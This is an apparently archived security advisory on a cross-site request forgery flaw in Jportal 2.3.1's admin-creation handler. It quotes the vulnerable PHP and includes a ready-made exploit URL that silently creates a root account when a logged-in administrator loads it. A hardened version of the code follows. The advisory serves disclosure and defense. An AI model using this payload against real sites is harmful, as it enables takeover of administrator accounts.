Jportal 2.3.1 CSRF vulnerability

2007.02.15
Credit: dzitu
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


Overall CVSS score: 9.3/10
Impact: 10/10
Exploitability: 8.6/10
Access required: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Type: CSRF Attack / Input Validation Error
Remote: Yes
Version: 2.3.1 (very possibly older versions are vulnerable too)

Problem is in admin/admin.adm.php:

    function add_admin()
    {
        // Under register_globals every one of these can be set by the request itself
        global $name, $mail, $nick_, $action, $user_tbl, $access;
        global $nick, $PHP_SELF, $_pass, $pass_, $acce, $op, $goto;

        if($access=='root')
        {
            if($_pass==$pass_)
            {
                if($acce[news]=='') $acce[news]='n';
                if($acce[info]=='') $acce[info]='n';
                if($acce[art]=='') $acce[art]='n';
                if($acce[sonda]=='') $acce[sonda]='n';
                if($acce[link]=='') $acce[link]='n';
                if($acce[forum]=='') $acce[forum]='n';
                if($acce[comm]=='') $acce[comm]='n';
                if($acce[menu]=='') $acce[menu]='n';
                if($acce[bann]=='') $acce[bann]='n';
                if($acce[topic]=='') $acce[topic]='n';
                if($acce[file]=='') $acce[file]='n';

                if($acce[root]<>'t')
                {
                    $acce_ = $acce[news].'-'.$acce[art].'-'.$acce[info].'-'.$acce[sonda].'-'.$acce[link].'-'.$acce[forum].'-'.$acce[comm].'-'.$acce[file].'-'.$acce[menu].'-'.$acce[bann].'-'.$acce[topic];
                }
                else
                {
                    $acce_ = 'root';
                }

                // No token or origin check: nothing ties this request to the admin panel
                $query = "INSERT INTO $user_tbl VALUES(NULL, '$nick_', '".md5($_pass)."', '$name', now(), '$acce_', '$mail', 1)";
                $result = mysql_query($query);
                add_log('dodano administratora (ID '.mysql_insert_id().')'); // "administrator added"
                if($goto=='') header("Location: admin.php?op=$op");
                else header("Location: $goto");
                exit;
            }
        }
    }

As we can see, all variables come from "nowhere" (i.e. they can arrive via POST, GET, or even COOKIE), and there is no check whether the script was launched by the admin through the admin panel or not. Because of this, if the admin has logged in and not logged out, and we get him to send a prepared request (for example using our profile avatar), we obtain a root account.

http://vulnerable_jportal/admin.php?op=admin&name=admin&mail=&nick_=admin&_pass=pass&pass_=haslo&acce%5Broot%5D=t&ok=dodaj&goto=&cmd=add

gives us a root account with name "admin" and password "pass".

Dżitu
dzitu (at) poczta (dot) fm
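A hardened version of the add-admin handler, added here as an illustration and not Jportal's own code: it takes the admin's role from the server-side session, accepts only POST requests that carry a per-session synchronizer token, reads its inputs explicitly from $_POST instead of register_globals, and binds the values with a prepared statement. csrf_token(), csrf_verify(), the mysqli handle, and the session key names are assumptions; password_hash() is swapped in for the original md5().

```php
<?php
// Added illustration, not Jportal code. Assumed: the session holds the admin's
// role under $_SESSION['access']; the admin form embeds csrf_token() as a
// hidden field named csrf_token; $db is a connected mysqli handle.
session_start();

// Per-session synchronizer token; the admin form must embed it.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A cross-site request cannot read the token, so a GET, or a POST without
// the session's token, is rejected. hash_equals() compares in constant time.
function csrf_verify(): bool {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        return false;
    }
    $sent = (string) ($_POST['csrf_token'] ?? '');
    return isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

function add_admin(mysqli $db, string $user_tbl): void {
    // Role comes from the server-side session, not from a request variable.
    if (($_SESSION['access'] ?? '') !== 'root' || !csrf_verify()) {
        http_response_code(403);
        exit('forbidden');
    }
    // Inputs are read explicitly; nothing is imported from the request as globals.
    $nick = (string) ($_POST['nick_'] ?? '');
    $name = (string) ($_POST['name'] ?? '');
    $mail = (string) ($_POST['mail'] ?? '');
    $pass = (string) ($_POST['_pass'] ?? '');
    if ($pass === '' || $pass !== ($_POST['pass_'] ?? null)) {
        exit('password mismatch');
    }
    $acce = (($_POST['acce']['root'] ?? '') === 't') ? 'root' : 'n-n-n-n-n-n-n-n-n-n-n';
    $hash = password_hash($pass, PASSWORD_DEFAULT); // swapped in for md5()
    // Values are bound rather than interpolated into the query string.
    $stmt = $db->prepare("INSERT INTO `$user_tbl` VALUES (NULL, ?, ?, ?, now(), ?, ?, 1)");
    $stmt->bind_param('sssss', $nick, $hash, $name, $acce, $mail);
    $stmt->execute();
    // Fixed same-site redirect instead of a request-controlled $goto.
    header('Location: admin.php?op=admin');
    exit;
}
```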



Copyright 2024, cxsecurity.com
